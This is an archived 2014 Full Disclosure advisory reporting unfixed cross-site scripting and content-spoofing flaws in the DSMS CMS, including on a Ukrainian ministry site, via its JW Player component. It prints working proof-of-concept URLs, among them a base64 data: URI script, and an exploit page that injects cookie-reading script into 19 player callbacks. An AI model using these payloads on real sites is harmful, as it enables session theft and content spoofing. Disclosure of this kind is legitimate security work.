Full Disclosure mailing list archives
XSS and CS vulnerabilities in DSMS
From: "MustLive" <mustlive () websecurity com ua>
Date: Sat, 15 Feb 2014 23:55:29 +0200
Hello list!There are Cross-Site Scripting and Content Spoofing vulnerabilities in DSMS. This is commercial CMS. It's used particularly at government site dsmsu.gov.ua - web site of Ministry of Youth and Sport of Ukraine.
There are also other vulnerabilities in the system, about which I've informed developers. None of the vulnerabilities were fixed.
------------------------- Affected products: ------------------------- Vulnerable are all versions of DSMS. ------------------------- Affected vendors: ------------------------- Strebul studio http://strebul.com ---------- Details: ---------- Cross-Site Scripting (WASC-08): http://site/templates/default/js/jwplayer/player.swf?playerready=alert(document.cookie) http://site/templates/default/js/jwplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg Cross-Site Scripting (WASC-08):If at the site at page with jwplayer.swf (player.swf) there is possibility (via HTML Injection) to include JS code with callback-function, and there are 19 such functions in total, then it's possible to conduct XSS attack. I.e. JS-callbacks can be used for XSS attack.
Example of exploit:
<script type="text/javascript" src="jwplayer.js"></script>
<div id="container">...</div>
<script type="text/javascript">
jwplayer("container").setup({
flashplayer: "jwplayer.swf",
file: "1.flv",
autostart: true,
height: 300,
width: 480,
events: {
onReady: function() { alert(document.cookie); },
onComplete: function() { alert(document.cookie); },
onBufferChange: function() { alert(document.cookie); },
onBufferFull: function() { alert(document.cookie); },
onError: function() { alert(document.cookie); },
onFullscreen: function() { alert(document.cookie); },
onMeta: function() { alert(document.cookie); },
onMute: function() { alert(document.cookie); },
onPlaylist: function() { alert(document.cookie); },
onPlaylistItem: function() { alert(document.cookie); },
onResize: function() { alert(document.cookie); },
onBeforePlay: function() { alert(document.cookie); },
onPlay: function() { alert(document.cookie); },
onPause: function() { alert(document.cookie); },
onBuffer: function() { alert(document.cookie); },
onSeek: function() { alert(document.cookie); },
onIdle: function() { alert(document.cookie); },
onTime: function() { alert(document.cookie); },
onVolume: function() { alert(document.cookie); }
}
});
</script>
Content Spoofing (WASC-12):
Swf-file of JW Player accepts arbitrary addresses in parameters file and
image, which allows to spoof content of flash - i.e. by setting addresses of
video (audio) and/or image files from other site.
http://site/templates/default/js/jwplayer/player.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF http://site/templates/default/js/jwplayer/player.swf?file=1.flv&image=1.jpgSwf-file of JW Player accepts arbitrary addresses in parameter config, which allows to spoof content of flash - i.e. by setting address of config file from other site (parameters file and image in xml-file accept arbitrary addresses). For loading of config file from other site it needs to have crossdomain.xml.
http://site/templates/default/js/jwplayer/player.swf?config=1.xml 1.xml <config> <file>1.flv</file> <image>1.jpg</image> </config>Swf-file of JW Player accepts arbitrary addresses in parameter playlistfile, which allows to spoof content of flash - i.e. by setting address of playlist file from other site (parameters media:content and media:thumbnail in xml-file accept arbitrary addresses). For loading of playlist file from other site it needs to have crossdomain.xml.
http://site/templates/default/js/jwplayer/player.swf?playlistfile=1.rss http://site/templates/default/js/jwplayer/player.swf?playlistfile=1.rss&playlist.position=right&playlist.size=200 1.rss <rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/";> <channel> <title>Example playlist</title> <item> <title>Video #1</title> <description>First video.</description> <media:content url="1.flv" duration="5" /> <media:thumbnail url="1.jpg" /> </item> <item> <title>Video #2</title> <description>Second video.</description> <media:content url="2.flv" duration="5" /> <media:thumbnail url="2.jpg" /> </item> </channel> </rss> ------------ Timeline:------------ 2013.11.04 - informed administrators of government site. No response, no fix.
2013.11.13 - announced at my site.2013.11.18 - informed developers about vulnerabilities in CMS and at dsmsu.gov.ua. They promised to fix holes in CMS and at web site, but didn't do it.
2014.02.15 - disclosed at my site (http://websecurity.com.ua/6860/). Best wishes & regards, MustLive Administrator of Websecurity web sitehttp://websecurity.com.ua
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- XSS and CS vulnerabilities in DSMS MustLive (Feb 15)